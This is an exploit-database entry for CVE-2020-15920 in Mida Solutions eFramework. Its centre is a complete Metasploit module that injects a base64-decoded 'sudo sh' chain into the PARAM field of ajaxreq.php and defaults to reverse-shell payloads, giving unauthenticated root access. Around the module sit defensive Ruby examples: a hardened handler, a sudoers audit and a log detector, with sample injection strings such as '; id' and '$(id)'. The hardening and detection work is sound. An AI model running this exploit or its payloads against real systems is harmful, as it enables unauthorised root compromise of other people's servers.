Mida Solutions eFramework ajaxreq.php Command Injection Exploit
2020-09-16T00:00:00
ID 1337DAY-ID-34943 Type zdt Reporter metasploit Modified 2020-09-16T00:00:00
Description
This Metasploit module exploits a command injection vulnerability in Mida Solutions eFramework version 2.9.0 and prior. The ajaxreq.php file allows unauthenticated users to inject arbitrary commands in the PARAM parameter to be executed as the apache user. The sudo configuration permits the apache user to execute any command as root without providing a password, resulting in privileged command execution as root. This module has been successfully tested on Mida Solutions eFramework-C7-2.9.0 virtual appliance.
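The description above names two root causes: the diagnostic endpoint hands the PARAM value to a shell, and the sudoers policy lets the web server account become root without a password. The Ruby below is an added example written for this page, not the product's code or the Metasploit module: it models the injection pattern as a constructed string-built command, puts the hardened handler next to it (allowlisted DIAGNOSIS value, PARAM validated as a hostname or IPv4 literal, argv-style execution so no shell parses the input), and adds a small sudoers audit for the second root cause. The tool names, the argument layout and the sample sudoers text are assumptions.

```ruby
require 'open3'

# Constructed model of the vulnerable pattern: the diagnosis tool and its
# argument are interpolated into a shell command line. This is NOT the
# product's code; the tool names are assumptions.
DIAGNOSIS_TOOLS = {
  'PING'       => ['ping', '-c', '4'],
  'TRACEROUTE' => ['traceroute']
}.freeze

def unsafe_command_line(diagnosis, param)
  tool = DIAGNOSIS_TOOLS[diagnosis]
  return nil unless tool
  # Shell metacharacters in param are honoured by the shell that runs this.
  "#{tool.join(' ')} #{param}"
end

# Hardened version. PARAM may only be an IPv4 literal or a DNS hostname;
# everything else (spaces, ';', '|', '$(', backticks, newlines) is rejected.
IPV4_RE = /\A(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}\z/
HOST_RE = /\A(?=.{1,253}\z)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\z/

def valid_target?(param)
  param.is_a?(String) && (param.match?(IPV4_RE) || param.match?(HOST_RE))
end

# Returns an argv array (never a shell string), or nil when the request
# fails the allowlist. DIAGNOSIS must be a known key, PARAM a bare target.
def safe_argv(diagnosis, param)
  tool = DIAGNOSIS_TOOLS[diagnosis]
  return nil unless tool && valid_target?(param)
  tool + [param]
end

def run_diagnosis(diagnosis, param)
  argv = safe_argv(diagnosis, param)
  raise ArgumentError, 'rejected diagnosis request' unless argv
  # Open3 with an argv array executes the program directly; /bin/sh is not
  # involved, so the validated target cannot grow extra commands.
  out, status = Open3.capture2e(*argv)
  [out, status.exitstatus]
end

# Second root cause: audit sudoers-style text for rules that let a web
# service account run ALL commands without a password.
def risky_sudoers_rules(sudoers_text, accounts = %w[apache www-data nginx])
  sudoers_text.each_line.map(&:strip).select do |line|
    next false if line.empty? || line.start_with?('#')
    user = line.split(/\s+/).first
    accounts.include?(user) && line.match?(/NOPASSWD:\s*ALL\b/)
  end
end

# Constructed sudoers sample (assumption, not the appliance's real file).
SAMPLE_SUDOERS = <<~SUDOERS
  # constructed sample
  root    ALL=(ALL) ALL
  %wheel  ALL=(ALL) ALL
  apache  ALL=(root) NOPASSWD: /usr/bin/ping
  apache  ALL=(ALL) NOPASSWD: ALL
SUDOERS

if __FILE__ == $PROGRAM_NAME
  puts unsafe_command_line('PING', '127.0.0.1; id')
  p safe_argv('PING', '127.0.0.1; id')        # nil: rejected
  p safe_argv('PING', '127.0.0.1')            # argv array
  p risky_sudoers_rules(SAMPLE_SUDOERS)
end
```

The point of `safe_argv` is that validation and argv construction are the same step: a request that reaches `Open3.capture2e` has already been reduced to a fixed tool plus one bare target, and the sudoers audit flags only the unrestricted `NOPASSWD: ALL` grant, not a narrowly scoped one for a single binary.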
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in Mida
          Solutions eFramework version 2.9.0 and prior.

          The `ajaxreq.php` file allows unauthenticated users to inject
          arbitrary commands in the `PARAM` parameter to be executed as
          the apache user. The sudo configuration permits the apache user
          to execute any command as root without providing a password,
          resulting in privileged command execution as root.

          This module has been successfully tested on Mida Solutions
          eFramework-C7-2.9.0 virtual appliance.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'elbae', # discovery and exploit
            'bcoles', # Metasploit
          ],
        'References' =>
          [
            ['CVE', '2020-15920'],
            ['EDB', '48768'],
            ['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],
          ],
        'Payload' => { 'BadChars' => "\x00" },
        'Targets' =>
          [
            [
              'Linux (x86)', {
                'Arch' => ARCH_X86,
                'Platform' => 'linux',
                'DefaultOptions' => {
                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
                }
              }
            ],
            [
              'Linux (x64)', {
                'Arch' => ARCH_X64,
                'Platform' => 'linux',
                'DefaultOptions' => {
                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
                }
              }
            ],
            [
              'UNIX (cmd)', {
                'Arch' => ARCH_CMD,
                'Platform' => 'unix',
                'DefaultOptions' => {
                  'PAYLOAD' => 'cmd/unix/reverse_bash'
                }
              }
            ]
          ],
        'Privileged' => true,
        'DisclosureDate' => '2020-07-24',
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'DefaultTarget' => 1,
        'Notes' =>
          {
            'Stability' => [ CRASH_SAFE ],
            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path to eFramework', '/'])
    ])
  end

  def check
    res = execute_command('id')

    unless res
      return CheckCode::Safe('Connection failed')
    end

    unless res.body.include?('uid=')
      return CheckCode::Safe('Target is not vulnerable')
    end

    CheckCode::Vulnerable
  end

  def execute_command(cmd, _opts = {})
    vars_post = {
      'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample,
      'PARAM' => ";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh"
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'),
      'vars_post' => vars_post
    }, 5)

    if res && !res.body.blank?
      vprint_status("Command output: #{res.body.gsub(/<br>/, "\n")}")
    end

    res
  end

  def exploit
    if target.arch.first == ARCH_CMD
      execute_command(payload.encoded)
    else
      execute_cmdstager(linemax: 1_500, background: true)
    end
  end
end
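The module's `Notes` declare IOC_IN_LOGS, and its `execute_command` shows exactly what reaches the server: a POST to `/PDC/ajaxreq.php` whose PARAM value starts with `;` and pipes a base64 blob through `base64 -d|sudo sh`. Ordinary access logs do not record POST bodies, so detection needs a source that does (a WAF or reverse-proxy audit log). The Ruby below is an added example for this page, not part of the module or of any vendor tooling: it scans a constructed tab-separated audit log (client, method, path, urlencoded body; this layout is an assumption) and raises an alert when the request targets the endpoint with an unexpected DIAGNOSIS value, shell metacharacters in PARAM, a PARAM that is not a bare host or address, or the module's decode-to-sudo chain.

```ruby
require 'uri'

# Constructed audit-log sample (assumption: one request per line,
# fields are client<TAB>method<TAB>path<TAB>urlencoded body).
SAMPLE_LOG = <<~LOG
  198.51.100.7\tPOST\t/PDC/ajaxreq.php\tDIAGNOSIS=PING&PARAM=10.0.0.5
  198.51.100.7\tPOST\t/PDC/ajaxreq.php\tDIAGNOSIS=TRACEROUTE&PARAM=%3Becho+aWQ%3D%7Cbase64+-d%7Csudo+sh
  203.0.113.9\tPOST\t/PDC/ajaxreq.php\tDIAGNOSIS=PING&PARAM=127.0.0.1+-c+0%3B+id
  203.0.113.9\tGET\t/PDC/index.php\t
  198.51.100.7\tPOST\t/PDC/ajaxreq.php\tDIAGNOSIS=PING&PARAM=%24%28id%29
LOG

ALLOWED_DIAGNOSIS = %w[PING TRACEROUTE].freeze
# Characters that let a value grow into additional shell commands.
SHELL_META = /[;|&`\n]|\$\(|\$\{/
# What a legitimate diagnostic target looks like: a bare host or address.
SAFE_PARAM = /\A[A-Za-z0-9.\-]{1,253}\z/
# The exact chain the Metasploit module builds in PARAM.
SUDO_CHAIN = /base64\s+-d\s*\|\s*sudo/

# Inspect one request; returns an alert hash or nil when nothing is wrong.
def inspect_ajaxreq_request(client, method, path, body)
  return nil unless method == 'POST' && path.end_with?('/PDC/ajaxreq.php')

  fields = URI.decode_www_form(body.to_s).to_h   # decodes %XX and '+'
  param = fields['PARAM'].to_s
  reasons = []
  reasons << 'unexpected DIAGNOSIS value' unless ALLOWED_DIAGNOSIS.include?(fields['DIAGNOSIS'])
  reasons << 'shell metacharacter in PARAM' if param.match?(SHELL_META)
  reasons << 'PARAM is not a bare host or address' unless param.match?(SAFE_PARAM)
  reasons << 'base64 decode piped to sudo shell (Metasploit module pattern)' if param.match?(SUDO_CHAIN)
  return nil if reasons.empty?

  { client: client, diagnosis: fields['DIAGNOSIS'], param: param, reasons: reasons }
end

# Run the inspection over every line of an audit log and collect alerts.
def scan_audit_log(text)
  text.each_line.map do |line|
    client, method, path, body = line.chomp.split("\t", 4)
    inspect_ajaxreq_request(client, method, path, body)
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_audit_log(SAMPLE_LOG).each do |alert|
    puts "#{alert[:client]} PARAM=#{alert[:param].inspect}: #{alert[:reasons].join('; ')}"
  end
end
```

The metacharacter and bare-host checks catch the manual variant as well as the module's base64 chain, so the detection does not depend on one exploit's wording; the chain regex is kept only to give the alert a precise label when that specific tool is seen.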